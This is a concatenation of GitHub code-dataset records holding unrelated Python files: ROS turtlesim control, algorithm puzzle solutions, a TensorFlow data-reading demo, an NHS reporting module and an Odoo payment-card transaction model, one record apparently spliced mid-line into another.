d['title']\n if 'type' in d:\n o.type = d['type']\n if 'user_id' in d:\n o.user_id = d['user_id']\n return o\n\n\n","repo_name":"antopen/alipay-sdk-python","sub_path":"alipay/aop/api/domain/AlipayCommerceIotMsgcenterSendModel.py","file_name":"AlipayCommerceIotMsgcenterSendModel.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"91"}
+{"seq_id":"34496621551","text":"#!/usr/bin/env python\n\nimport rospy\nimport math\n\nfrom turtlesim.srv import Spawn, SpawnRequest, SpawnResponse, Kill, KillRequest, KillResponse\nfrom turtlesim.msg import Pose\nfrom geometry_msgs.msg import Twist\nfrom ejer2.srv import RespuestaServicio, RespuestaServicioRequest, RespuestaServicioResponse\n\ndef crearTortuga(nombre,x,y,theta):\n\n rospy.wait_for_service('/spawn')\n servicio = rospy.ServiceProxy('/spawn',Spawn)\n\n arg = SpawnRequest()\n arg.x = float(x)\n arg.y = float(y)\n arg.theta = float(theta)\n arg.name = str(nombre)\n\n result = servicio(arg)\n\n print(\"Tortuga creada:\",result.name)\n\ndef borrarTortuga(nombre):\n\n rospy.wait_for_service('/kill')\n servicio = rospy.ServiceProxy('/kill',Kill)\n\n arg = KillRequest()\n arg.name = str(nombre)\n\n result = servicio(arg)\n print(\"Tortuga borrada:\",nombre)\n\ndef callbackPresa(msg):\n global presa_x, presa_y, presa_theta, presa_linear, presa_angular, recibi_presa\n presa_x = msg.x\n presa_y = msg.y\n presa_theta = msg.theta\n presa_linear = msg.linear_velocity\n presa_angular = msg.angular_velocity\n\n recibi_presa = True\n\ndef callbackDepredador(msg):\n global depredador_x, depredador_y, depredador_theta, depredador_linear, depredador_angular, recibi_depredador\n depredador_x = msg.x\n depredador_y = msg.y\n depredador_theta = msg.theta\n depredador_linear = msg.linear_velocity\n depredador_angular = msg.angular_velocity\n\n recibi_depredador = True\n\ndef callbackService(request):\n umbral = int(request.distancia)\n\n crearTortuga(\"presa\",5,10,3.1416)\n crearTortuga(\"depredador\",4.9,5,6)\n borrarTortuga(\"turtle1\")\n\n # nos conectamos al publicador de velocidades\n pubPresaVel = rospy.Publisher(\"/presa/cmd_vel\", Twist)\n pubDepredadorVel = rospy.Publisher(\"/depredador/cmd_vel\", Twist)\n\n susPresa = rospy.Subscriber('/presa/pose',Pose,callbackPresa)\n susDepredador = rospy.Subscriber('/depredador/pose',Pose,callbackDepredador)\n\n rate = rospy.Rate(4)\n # esperamos a tener los primeros datos de las tortugas\n while (not recibi_presa and not recibi_depredador):\n rate.sleep()\n\n # calculo primera distancia\n xb = presa_x - depredador_x \n yb = presa_y - depredador_y \n distancia = math.sqrt(math.pow(xb,2)+math.pow(yb,2))\n\n while distancia>umbral and not rospy.is_shutdown():\n vel_linear_x = 1.5 * math.sqrt(math.pow((presa_x - depredador_x),2) + math.pow((presa_y - depredador_y),2))\n vel_angular_z = 4 * (math.atan2(presa_y - depredador_y, presa_x - depredador_x) - depredador_theta)\n\n xb = presa_x - depredador_x \n yb = presa_y - depredador_y \n distancia = math.sqrt(math.pow(xb,2)+math.pow(yb,2))\n\n twistPresa = Twist()\n twistPresa.linear.x = float(0.3)\n twistPresa.angular.z = float(0.08)\n\n twistDepredador = Twist()\n twistDepredador.linear.x = float(vel_linear_x * 0.91)\n twistDepredador.angular.z = float(vel_angular_z)\n\n pubPresaVel.publish(twistPresa)\n pubDepredadorVel.publish(twistDepredador) \n\n rate.sleep() \n\n # detenemos el depredador\n twistDep = Twist()\n twistDep.linear.x = float(0)\n twistDep.angular.z = float(0)\n pubDepredadorVel.publish(twistDep)\n\n tret = RespuestaServicioResponse()\n # tomo correcto o no si se ha aproximado lo suficiente\n tret.correcto = distanciam): \n p[w][m] = p[w-m][m-1] + p[w][m-1]\n\ndef answer(n):\n fillP();\n return p[n][n] - 1;\n\nimport time\nstart_time = time.time()\nprint(answer(20))\nend_time = time.time()\n\nprint(\"Elapsed time:\",end_time-start_time)\n","repo_name":"dorairajsanjay/foobar_stairs","sub_path":"split_frominternet.py","file_name":"split_frominternet.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"10845875326","text":"\"\"\"\nPyPy3 풀이\n\n풀이시간 : 2시간 5분\n\n[시간 초과로 두드려 맞은 과정]\n1. 처음엔 각 위치를 heapq(Priority Queue)로 저장하고, 여름 + 가을 + 겨울을 합쳤음. => 시간초과\n2. 3차원 list + 정렬로 바꿔봄\n3. dictionary(HashMap)로 저장해서 key: 나무 나이, value: 나무 개수로 계산해봄. (근데 Python3으로 통과하려면 이렇게 해야하네..?)\n3. 죽은 나무를 저장하던 3차원 list를 제거\n4. 질문 게시판에서 deque()를 보고 적용 + sys.stdin.readline\n - 나무를 뺄때는 popleft, 번식으로 넣을땐 appendleft(1)\n - https://www.acmicpc.net/board/view/110170\n - deque로 번식으로 태어난 나이가 1인 나무만 계속 왼쪽에 넣어주면 정렬할 필요가 없음\n5. deepcopy 제거\n\n욕나옴\n\"\"\"\nimport sys\nfrom collections import deque\n\ninput = sys.stdin.readline\nN, M, K = map(int, input().split())\n\n# 같은 1×1 크기의 칸에 여러 개의 나무가 심어져 있을 수도 있다.\ntree = [[deque() for _ in range(N)] for _ in range(N)]\nfood = [[5] * N for _ in range(N)]\nrobot = list(list(map(int, input().split())) for _ in range(N))\n\ndr = [1, 1, 1, 0, 0, -1, -1, -1]\ndc = [0, 1, -1, 1, -1, 0, 1, -1]\n\n\ndef in_range(r, c):\n return 0 <= r < N and 0 <= c < N\n\n\ndef spring():\n \"\"\"\n 나무가 자신의 나이만큼 양분을 먹고, 나이가 1 증가한다.\n 각각의 나무는 나무가 있는 1×1 크기의 칸에 있는 양분만 먹을 수 있다.\n 하나의 칸에 여러 개의 나무가 있다면, 나이가 어린 나무부터 양분을 먹는다.\n 만약, 땅에 양분이 부족해 자신의 나이만큼 양분을 먹을 수 없는 나무는 양분을 먹지 못하고 즉시 죽는다.\n \"\"\"\n grow = [[deque() for _ in range(N)] for _ in range(N)] # 새로 자라난 나무\n\n for r in range(N):\n for c in range(N):\n if tree[r][c]:\n dead = 0 # 바로 food에 반영하면 겹침\n for age in tree[r][c]:\n if food[r][c] >= age:\n grow[r][c].append(age+1)\n food[r][c] -= age\n else:\n dead += (age // 2) # 여기서 '여름' 처리\n food[r][c] += dead\n # 1씩 자란 나무들 복붙\n tree[r][c] = grow[r][c]\n\n\ndef autumn():\n \"\"\"\n 나무가 번식한다. 번식하는 나무는 나이가 5의 배수이어야 하며, 인접한 8개의 칸에 나이가 1인 나무가 생긴다.\n 상도의 땅을 벗어나는 칸에는 나무가 생기지 않는다.\n \"\"\"\n for r in range(N):\n for c in range(N):\n for age in tree[r][c]:\n if age % 5 == 0:\n for d in range(8):\n nr, nc = r + dr[d], c + dc[d]\n if 0 <= nr < N and 0 <= nc < N:\n tree[nr][nc].appendleft(1)\n food[r][c] += robot[r][c] # 여기서 '겨울' 처리\n\n\ndef get_answer():\n answer = 0\n\n for r in range(N):\n for c in range(N):\n answer += len(tree[r][c])\n\n print(answer)\n\n\ndef solution():\n for _ in range(M):\n x, y, z = map(int, input().split())\n tree[x-1][y-1].append(z)\n\n for _ in range(K):\n spring()\n autumn()\n get_answer()\n\n\nsolution()","repo_name":"pear96/TIL","sub_path":"SS/A형대비/나무재테크_배하은.py","file_name":"나무재테크_배하은.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"41936838839","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n# coding=utf-8 \n\n\"\"\"\n@author: Li Tian\n@contact: 694317828@qq.com\n@software: pycharm\n@file: sample_data_deal1.py\n@time: 2019/2/3 22:00\n@desc: 展示了tf.train.match_filenames_once函数和tf.train.string_input_producer函数的使用方法\n\"\"\"\n\nimport tensorflow as tf\n\n# 使用tf.train.match_filenames_once函数获取文件列表\nfiles = tf.train.match_filenames_once('./data.tfrecords-*')\n\n# 通过tf.train.string_input_producer函数创建输入队列,输入队列中的文件列表为\n# tf.train.match_filenames_once函数获取的文件列表。这里将shuffle参数设为False\n# 来避免随机打乱读文件的顺序。但一般在解决真实问题时,会将shuffle参数设置为True\nfilename_queue = tf.train.string_input_producer(files, shuffle=False)\n\n# 如前面所示读取并解析一个样本\nreader = tf.TFRecordReader()\n_, serialized_example = reader.read(filename_queue)\nfeatures = tf.parse_single_example(\n serialized_example,\n features={\n 'i': tf.FixedLenFeature([], tf.int64),\n 'j': tf.FixedLenFeature([], tf.int64),\n }\n)\n\nwith tf.Session() as sess:\n # 虽然在本段程序中没有声明任何变量,但使用tf.train.match_filenames_once函数时\n # 需要初始化一些变量。\n tf.local_variables_initializer().run()\n print(sess.run(files))\n\n # 声明tf.train.Coordinator类来协同不同线程,并启动线程。\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n # 多次执行获取数据的操作\n for i in range(6):\n print(sess.run([features['i'], features['j']]))\n\n # 请求处理的线程停止\n coord.request_stop()\n # 等待,直到处理的线程已经停止\n coord.join(threads)","repo_name":"TinyHandsome/BookStudy","sub_path":"1-books/book2_TensorFlow实战Google深度学习框架(第二版)/figuredata_deal/sample_data_deal1.py","file_name":"sample_data_deal1.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"zh","doc_type":"code","stars":11,"dataset":"github-code","pt":"91"}
+{"seq_id":"35774629956","text":"import csv\nfrom datetime import date, datetime\nfrom pathlib import Path\nfrom typing import Generator\n\nfrom pydantic import ValidationError\n\nfrom helpers.log import log\nfrom mi.reporting.constants import (\n PATH_TO_REPORT_CSV,\n SQL_ALIAS_SEPARATOR_REGEX,\n SQL_FUNCTION_PARAMS_REGEX,\n SQL_SELECT_REGEX,\n SQL_SELECT_SEPARATOR,\n)\nfrom mi.reporting.resources import (\n each_report_sql_statement,\n get_credentials,\n get_lambda_name,\n get_rds_endpoint,\n make_report_path,\n)\nfrom mi.sql_query.model import Response, Sql, SqlQueryEvent, Status\n\n\n@log(\"Created query events\")\ndef each_stored_query_event(\n session,\n workspace: str,\n env: str,\n partition_key: str,\n start_date: str,\n end_date: str,\n) -> Generator[tuple[str, SqlQueryEvent], None, None]:\n credentials = get_credentials(session=session, workspace=workspace)\n endpoint = get_rds_endpoint(session=session, env=env)\n for report_name, statement in each_report_sql_statement():\n yield report_name, SqlQueryEvent(\n sql=Sql(\n statement=statement,\n params={\n \"partition_key\": partition_key,\n \"start_date\": start_date,\n \"end_date\": end_date,\n },\n ),\n endpoint=endpoint,\n **credentials,\n )\n\n\ndef _select_statement_from_sql_query(query: str) -> str:\n try:\n (select,) = SQL_SELECT_REGEX.match(query).groups()\n except:\n raise ValueError(f\"Couldn't find valid SELECT statement in query {query}\")\n return select\n\n\ndef _column_name_from_statement(column_statement: str) -> str:\n \"\"\"column_statement ~ 'foo' or 'foo as FOO' or 'foo AS FOO' --> 'foo'\"\"\"\n parts = SQL_ALIAS_SEPARATOR_REGEX.split(column_statement)\n last_part = parts[-1]\n return last_part.strip()\n\n\ndef _column_names_from_sql_query(query: str):\n select = _select_statement_from_sql_query(query=query)\n _select = SQL_FUNCTION_PARAMS_REGEX.sub(string=select, repl=\"\")\n column_names = list(\n map(_column_name_from_statement, _select.split(SQL_SELECT_SEPARATOR))\n )\n return column_names\n\n\ndef perform_query(\n session, workspace: str, event: SqlQueryEvent\n) -> list[dict[str, any]]:\n function_name = get_lambda_name(workspace=workspace)\n client = session.client(\"lambda\")\n column_names = _column_names_from_sql_query(query=event.sql.statement)\n raw_response = client.invoke(FunctionName=function_name, Payload=event.json())\n _raw_response = raw_response[\"Payload\"].read()\n try:\n response = Response.parse_raw(_raw_response)\n except ValidationError:\n raise Exception(_raw_response)\n if response.status != Status.OK:\n raise Exception(\n f\"\\nSQL event:\\n\\n{event}\\n\\ngot response:\\n\\n{response.outcome}\"\n )\n return [dict(zip(column_names, line)) for line in response.results]\n\n\ndef _get_column_names(data: list[dict]) -> list[str]:\n for row in data:\n return list(row.keys())\n return []\n\n\n@log(\"Wrote report to {__result__}\")\ndef write_csv(\n data: list[dict],\n env: str,\n workspace: str,\n report_name: str,\n path: Path = PATH_TO_REPORT_CSV, # for dependency-injection in unit testing\n today: date = None, # for dependency-injection in unit testing\n now: datetime = None, # for dependency-injection in unit testing\n partition_key: str = None,\n) -> str:\n today = date.today() if today is None else today\n now = datetime.now() if now is None else now\n\n out_path = make_report_path(\n path=path,\n env=env,\n workspace=workspace,\n report_name=report_name,\n today=today,\n now=now,\n partition_key=partition_key,\n )\n column_names = _get_column_names(data=data)\n with open(out_path, \"w\") as csv_file:\n writer = csv.DictWriter(\n csv_file, fieldnames=column_names, quoting=csv.QUOTE_NONNUMERIC\n )\n writer.writeheader()\n for line in data:\n writer.writerow(line)\n return out_path\n","repo_name":"NHSDigital/NRLF","sub_path":"mi/reporting/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"}
+{"seq_id":"25641822288","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 14 21:22:59 2023\n\n@author: yesenia\n\"\"\"\n\nn = int(input())\n\ni = 0\n\nwhile i < 100:\n if 2**i == n:\n print (i)\n break;\n i += 1","repo_name":"yesenia0490/practica_python","sub_path":"omegaup_potenciasdel2.py","file_name":"omegaup_potenciasdel2.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"6692138642","text":"A = [1, 2, 4, 5, 7]\nB = [5, 6, 3, 4, 8]\nX=9\n\nN = len(A)\nM = len(B)\n\ndef pairs_with_sum(a,b,n,m, X):\n res= []\n for i in range(n):\n for j in range(m):\n if (a[i] + b[j] == X):\n res.append((i,j))\n print(res)\n\npairs_with_sum(A,B,N, M, X)\n\n# def findPairs(lst, K):\n# res = []\n# while lst:\n# num = lst.pop()\n# diff = K - num\n# if diff in lst:\n# res.append((diff, num))\n#\n# #res.reverse()\n# return res\n#\n#\n# # Driver code\n# lst = [1, 5, 3, 7, 9]\n# K = 12\n# print(findPairs(lst, K))","repo_name":"ETyrion/interviewPrepCodes","sub_path":"codingChallenge/pairsWIthGivenSum.py","file_name":"pairsWIthGivenSum.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"70011051183","text":"import json\n\n'''\nServe apenas para guardar o estado dos statements \n'''\n\n\nclass Node:\n def __init__(self, arg_name, arg_children=None):\n self.text = {\"name\": arg_name}\n if arg_children is None:\n self.children = []\n else:\n self.children = arg_children\n\n\nclass ParsedTree:\n def __init__(self, root: Node):\n self.chart = {\n \"container\": \"#parsed-tree\",\n \"connectors\": {\n \"type\": \"straight\"\n }\n }\n self.nodeStructure = root\n\n\nclass Wrapper:\n def __init__(self, arg):\n self.JSONParsedTree = arg\n\n\ndef serialize(obj):\n \"\"\"JSON serializer for objects not serializable by default json code\"\"\"\n try:\n return obj.__dict__\n except AttributeError:\n return None\n\n\ndef write(root: Node, filename: str):\n data = json.dumps(ParsedTree(root), default=serialize)\n with open('./%s.json' % filename, 'w') as f:\n f.write(\"JSONParsedTree = \")\n f.write(data)\n","repo_name":"luciojb/compilador-blm","sub_path":"rply/ArvoreJSON.py","file_name":"ArvoreJSON.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"7455697916","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import UserError, ValidationError\nfrom odoo.tools import float_compare\nfrom odoo.tools.misc import format_amount\nimport requests\nimport base64\nimport logging\nfrom urllib.parse import urlparse\nimport os\nimport io\nimport logging\nfrom unidecode import unidecode\n\nMEANINGFUL_PARTNER_NAME_MIN_SIZE = 3\nTIMEOUT = 30\n\nlogger = logging.getLogger(__name__)\n\ntry:\n from PIL import Image, ImageOps\nexcept ImportError:\n logger.debug('Cannot import Pillow version >= 6.0.0')\n\n\nclass NewgenPaymentCardTransaction(models.Model):\n _name = 'newgen.payment.card.transaction'\n _description = 'New-generation payment card transaction'\n _inherit = ['mail.thread', 'mail.activity.mixin', 'analytic.mixin']\n _order = 'date desc'\n _check_company_auto = True\n\n name = fields.Char(string='Number', readonly=True, default=lambda self: _(\"New\"))\n company_id = fields.Many2one(\n 'res.company', string='Company', required=True, readonly=True,\n default=lambda self: self.env.company)\n company_currency_id = fields.Many2one(\n 'res.currency', related='company_id.currency_id',\n string=\"Company Currency\", store=True)\n description = fields.Char(\n string='Description', states={'done': [('readonly', True)]})\n unique_import_id = fields.Char(\n string='Unique Identifier', readonly=True, copy=False)\n date = fields.Date(\n string='Bank Transaction Date', required=True, readonly=True,\n help=\"This is the date of the bank transaction written on the \"\n \"bank statement. It may be a few days after the payment date. \"\n \"It is used for the payment move.\")\n payment_date = fields.Datetime(\n string='Payment Date', readonly=True,\n help=\"This is the real date of the payment. It may be a few days \"\n \"before the date of the bank transaction written on the bank \"\n \"statement. It is used for the supplier invoice.\")\n force_invoice_date = fields.Date(\n string='Force Invoice Date', states={'done': [('readonly', True)]})\n card_id = fields.Many2one(\n 'newgen.payment.card', string='Card', readonly=True,\n ondelete='restrict', check_company=True)\n expense_categ_name = fields.Char(\n string='Expense Category Name', readonly=True)\n expense_account_id = fields.Many2one(\n 'account.account', states={'done': [('readonly', True)]},\n domain=\"[('deprecated', '=', False), ('company_id', '=', company_id), ('is_off_balance', '=', False)]\",\n string='Expense Account', check_company=True)\n analytic_distribution = fields.Json(states={'done': [('readonly', True)]})\n country_id = fields.Many2one('res.country', string='Country')\n vendor = fields.Char(string='Vendor', readonly=True)\n vendor_vat = fields.Char(string='Vendor VAT Number', readonly=True)\n partner_id = fields.Many2one(\n 'res.partner', string='Vendor Partner',\n domain=[('parent_id', '=', False)],\n states={'draft': [('readonly', False)]}, ondelete='restrict',\n compute=\"_compute_partner_id\", store=True, precompute=True,\n help=\"By default, all transactions are linked to the generic \"\n \"supplier 'Misc Suppliers'. You can change the partner \"\n \"to the real partner of the transaction if you want, but it may not \"\n \"be worth the additionnal work.\")\n transaction_type = fields.Selection([\n ('load', 'Load'),\n ('expense', 'Expense'),\n ], string='Transaction Type', readonly=True)\n autoliquidation = fields.Selection([\n ('intracom', 'Intra-EU'),\n ('extracom', 'Extra-EU'),\n ('none', 'None'),\n ], default='none', string='Auto-Liquidation',\n states={'done': [('readonly', True)]})\n vat_company_currency = fields.Monetary(\n string='VAT Amount',\n # not readonly, because accountant may have to change the value\n currency_field='company_currency_id',\n states={'done': [('readonly', True)]},\n help='VAT Amount in Company Currency')\n vat_rate = fields.Float(\n string='VAT Rate (%)', states={'done': [('readonly', True)]},\n digits=(16, 4),\n help='Main VAT rate of the transaction in percent.')\n total_company_currency = fields.Monetary(\n string='Total Amount in Company Currency',\n currency_field='company_currency_id', readonly=True)\n currency_id = fields.Many2one(\n 'res.currency', string='Expense Currency', readonly=True)\n total_currency = fields.Monetary(\n string='Total Amount in Expense Currency', readonly=True,\n currency_field='currency_id')\n image_url = fields.Char(string='Image URL', readonly=True)\n receipt_lost = fields.Boolean(\n string='Receipt Lost', states={'done': [('readonly', True)]})\n state = fields.Selection([\n ('draft', 'Draft'),\n ('done', 'Done'),\n ], string='State', default='draft', readonly=True)\n receipt_number = fields.Char(string='Receipt Number', readonly=True)\n bank_move_only = fields.Boolean(\n string=\"Generate Bank Move Only\",\n states={'done': [('readonly', True)]},\n help=\"When you process a transaction on which this option is enabled, \"\n \"Odoo will only generate the move in the bank journal, it will not \"\n \"generate a supplier invoice/refund. This option is useful when you \"\n \"make a payment in advance and you haven't received the invoice yet.\")\n invoice_id = fields.Many2one(\n 'account.move', string='Invoice', check_company=True,\n states={'done': [('readonly', True)]})\n invoice_payment_state = fields.Selection(\n related='invoice_id.payment_state', string=\"Invoice Payment Status\")\n reconcile_id = fields.Many2one(\n 'account.full.reconcile', string=\"Reconcile\",\n compute='_compute_reconcile_id', readonly=True)\n bank_counterpart_account_id = fields.Many2one(\n 'account.account',\n compute='_compute_bank_counterpart_account_id', store=True, precompute=True,\n readonly=False, states={'done': [('readonly', True)]},\n domain=\"[('deprecated', '=', False), ('company_id', '=', company_id), ('is_off_balance', '=', False)]\",\n string=\"Counter-part of Bank Move\", check_company=True)\n bank_move_id = fields.Many2one(\n 'account.move', string=\"Bank Move\", readonly=True, check_company=True)\n\n _sql_constraints = [(\n 'unique_import_id',\n 'unique(unique_import_id)',\n 'A payment card transaction can be imported only once!')]\n\n @api.model_create_multi\n def create(self, vals_list):\n for vals in vals_list:\n if 'company_id' in vals:\n self = self.with_company(vals['company_id'])\n if vals.get('name', _(\"New\")) == _(\"New\"):\n vals['name'] = self.env['ir.sequence'].next_by_code(\n 'newgen.payment.card.transaction',\n sequence_date=vals.get('date')) or _(\"New\")\n return super().create(vals_list)\n\n @api.depends('bank_move_id')\n def _compute_reconcile_id(self):\n for trans in self:\n reconcile_id = False\n if trans.bank_move_id:\n for line in trans.bank_move_id.line_ids:\n if (\n line.account_id ==\n trans.bank_counterpart_account_id and\n line.full_reconcile_id):\n reconcile_id = line.full_reconcile_id.id\n trans.reconcile_id = reconcile_id\n\n @api.depends(\"partner_id\", \"expense_account_id\")\n def _compute_analytic_distribution(self):\n for trans in self:\n distribution = self.env[\n \"account.analytic.distribution.model\"\n ]._get_distribution(\n {\n \"partner_id\": trans.partner_id.id,\n \"partner_category_id\": trans.partner_id.category_id.ids,\n \"account_prefix\": trans.expense_account_id.code,\n \"company_id\": trans.company_id.id,\n }\n )\n trans.analytic_distribution = distribution or trans.analytic_distribution\n\n @api.depends('invoice_id')\n def _compute_partner_id(self):\n for trans in self:\n if trans.invoice_id:\n partner = trans.invoice_id.commercial_partner_id\n else:\n partner = trans._default_partner()\n trans.partner_id = partner and partner.id or False\n\n def _default_partner(self, raise_if_not_found=False):\n return self.env.ref(\n 'base_newgen_payment_card.misc_supplier',\n raise_if_not_found=raise_if_not_found)\n\n @api.constrains('transaction_type', 'partner_id')\n def _check_transaction(self):\n for trans in self:\n if trans.transaction_type == 'expense' and not trans.partner_id:\n raise ValidationError(_(\n \"Partner missing on expense transaction '%s'.\")\n % trans.display_name)\n\n def open_image_url(self):\n if not self.image_url:\n raise UserError(_(\n \"Missing image URL for transaction %s.\") % self.display_name)\n action = {\n 'type': 'ir.actions.act_url',\n 'url': self.image_url,\n 'target': 'new',\n }\n return action\n\n def unlink(self):\n for trans in self:\n if trans.state == 'done':\n raise UserError(_(\n \"Cannot delete transaction '%s' which is in \"\n \"done state.\") % trans.name)\n return super().unlink()\n\n @api.depends('partner_id', 'transaction_type', 'company_id')\n def _compute_bank_counterpart_account_id(self):\n for trans in self:\n account_id = False\n if trans.transaction_type == 'load':\n account_id = trans.company_id.transfer_account_id.id or False\n elif trans.transaction_type == 'expense':\n if trans.partner_id:\n account_id = trans.with_company(trans.company_id.id).partner_id.property_account_payable_id.id\n else:\n account_id = self.env['ir.property'].with_company(\n trans.company_id.id)._get(\n 'property_account_payable_id', 'res.partner')\n trans.bank_counterpart_account_id = account_id\n\n def process_line(self):\n for line in self:\n if line.state != 'draft':\n logger.warning(\n 'Skipping transaction %s which is not draft',\n line.name)\n continue\n vals = {'state': 'done'}\n bank_move = line.generate_bank_journal_move()\n vals['bank_move_id'] = bank_move.id\n if line.transaction_type == 'expense':\n if not line.bank_move_only:\n if line.invoice_id:\n self.check_existing_invoice()\n invoice = line.invoice_id\n else:\n invoice = line.generate_invoice()\n vals['invoice_id'] = invoice.id\n rec = line.reconcile(bank_move, invoice)\n vals['reconcile_id'] = rec.id\n line.write(vals)\n return True\n\n def _prepare_bank_journal_move(self):\n self.ensure_one()\n amount = self.total_company_currency\n if self.company_currency_id.compare_amounts(amount, 0) > 0:\n credit = 0\n debit = amount\n else:\n credit = amount * -1\n debit = 0\n if not self.card_id.journal_id:\n raise UserError(_(\n \"Bank Journal not configured on payment card '%s'\")\n % self.card_id.name)\n journal = self.card_id.journal_id\n if not self.bank_counterpart_account_id:\n raise UserError(_(\n \"Counter-part of Bank Move is empty \"\n \"on transaction %s.\") % self.name)\n transaction_type = dict(\n self.fields_get(\n 'transaction_type',\n 'selection')['transaction_type']['selection'])[self.transaction_type]\n ref = '%s (%s)' % (self.name, transaction_type)\n if self.transaction_type == 'expense':\n partner_id = self.partner_id.id\n elif self.transaction_type == 'load':\n partner_id = False\n mvals = {\n 'journal_id': journal.id,\n 'date': self.date,\n 'ref': ref,\n 'line_ids': [\n (0, 0, {\n 'account_id': journal.default_account_id.id,\n 'debit': debit,\n 'credit': credit,\n 'partner_id': partner_id,\n }),\n (0, 0, {\n 'account_id': self.bank_counterpart_account_id.id,\n 'debit': credit,\n 'credit': debit,\n 'partner_id': partner_id,\n }),\n ],\n }\n return mvals\n\n def generate_bank_journal_move(self):\n self.ensure_one()\n vals = self._prepare_bank_journal_move()\n bank_move = self.env['account.move'].create(vals)\n bank_move._post(soft=False)\n return bank_move\n\n def _countries_vat_refund(self):\n return self.company_id.country_id\n\n def _prepare_autoliquidation_taxes(self):\n self.ensure_one()\n assert self.autoliquidation in ('intracom', 'extracom')\n ato = self.env[\"account.tax\"]\n autoliq2categ = {\n 'intracom': 'K',\n 'extracom': 'G',\n }\n domain = [\n ('company_id', '=', self.company_id.id),\n ('type_tax_use', '=', 'purchase'),\n ('unece_type_code', '=', 'VAT'),\n ('amount_type', '=', 'percent'),\n ('amount', '>', 0),\n ('unece_categ_code', '=', autoliq2categ[self.autoliquidation]),\n ]\n if hasattr(ato, 'fr_vat_autoliquidation'):\n domain.append(('fr_vat_autoliquidation', '=', True))\n tax = ato.search(domain, order='amount desc', limit=1)\n if not tax:\n raise UserError(_(\n \"Odoo could not find any %s auto-liquidation tax properly configured \"\n \"in company '%s'.\") % (\n self._fields['autoliquidation'].convert_to_export(\n self.autoliquidation, self),\n self.company_id.display_name))\n taxes = [{'id': tax.id}]\n return taxes\n\n def _prepare_regular_taxes(self):\n # This method is inherited in l10n_fr_base_newgen_payment_card\n self.ensure_one()\n taxes = [{\n 'amount_type': 'percent',\n 'amount': self.vat_rate,\n 'unece_type_code': 'VAT',\n 'unece_categ_code': 'S',\n }]\n return taxes\n\n def _prepare_invoice_import(self):\n self.ensure_one()\n if self.force_invoice_date:\n date_dt = self.force_invoice_date\n elif self.payment_date:\n date_dt = self.payment_date\n else:\n date_dt = self.date\n date = fields.Date.to_string(date_dt)\n vat_compare = self.company_currency_id.compare_amounts(\n self.vat_company_currency, 0)\n total_compare = self.company_currency_id.compare_amounts(\n self.total_company_currency, 0)\n if vat_compare:\n if (\n self.country_id and\n self.company_id.country_id and\n self.country_id not in self._countries_vat_refund()):\n raise UserError(_(\n \"The transaction '%s' is associated with country \"\n \"'%s'. As we cannot refund VAT from this country, \"\n \"the VAT amount of that transaction should be updated \"\n \"to 0.\")\n % (self.name, self.country_id.name))\n if vat_compare != total_compare:\n raise UserError(_(\n \"The sign of the VAT amount (%s) should be the same as \"\n \"the sign of the total amount (%s).\")\n % (self.vat_company_currency, self.total_company_currency))\n\n taxes = self._prepare_regular_taxes()\n elif self.autoliquidation in ('intracom', 'extracom'):\n taxes = self._prepare_autoliquidation_taxes()\n else:\n taxes = []\n if not self.description:\n raise UserError(_(\"Description is missing on transaction %s.\") % self.name)\n origin = self.name\n if self.receipt_number:\n origin = '%s (%s)' % (origin, self.receipt_number)\n amount_untaxed = self.total_company_currency * -1\\\n - self.vat_company_currency * -1\n price_unit = amount_untaxed\n qty = 1\n if total_compare > 0: # refund\n qty *= -1\n price_unit *= -1\n parsed_inv = {\n 'partner': {'recordset': self.partner_id},\n 'date': date,\n 'date_due': date,\n 'currency': {'recordset': self.company_id.currency_id},\n 'amount_total': self.total_company_currency * -1,\n 'amount_untaxed': amount_untaxed,\n 'invoice_number': self.name,\n 'lines': [{\n 'taxes': taxes,\n 'price_unit': price_unit,\n 'name': self.description,\n 'qty': qty,\n 'uom': {'recordset': self.env.ref('uom.product_uom_unit')},\n }],\n 'origin': origin,\n }\n url = self.image_url\n attachments = self.env['ir.attachment'].search([\n ('res_model', '=', self._name),\n ('res_id', '=', self.id),\n ])\n if not url and not attachments and not self.receipt_lost:\n raise UserError(_(\n \"Missing image URL and/or attachments on transaction %s. \"\n \"If you lost that receipt, you can mark this transaction \"\n \"as 'Receipt Lost'.\")\n % self.name)\n\n parsed_inv['attachments'] = {}\n if url:\n try:\n rimage = requests.get(url, timeout=TIMEOUT)\n except Exception as e:\n raise UserError(_(\n \"Failed to download the image of the receipt. \"\n \"Error message: %s.\") % e)\n if rimage.status_code != 200:\n raise UserError(_(\n \"Could not download the image of transaction %s \"\n \"from URL %s (HTTP error code %s).\")\n % (self.name, url, rimage.status_code))\n image_binary = rimage.content\n file_extension = os.path.splitext(urlparse(url).path)[1]\n logger.debug('file_extension=%s', file_extension)\n if file_extension in ('.JPG', '.JPEG', '.jpg', '.jpeg'):\n logger.debug('Trying to rotate the JPG image %s', url)\n try:\n image_binary = self._rotate_image(image_binary)\n logger.info('JPEG file successfully rotated')\n except Exception as e:\n logger.info('Failed to rotate the image. Error: %s', e)\n pass\n filename = 'Receipt-%s%s' % (self.name, file_extension)\n image_b64 = base64.encodebytes(image_binary)\n parsed_inv['attachments'] = {filename: image_b64}\n if attachments:\n for att in attachments:\n parsed_inv['attachments'][att.name] = att.datas\n # TODO: delete attachments on transaction once invoice is created ?\n return 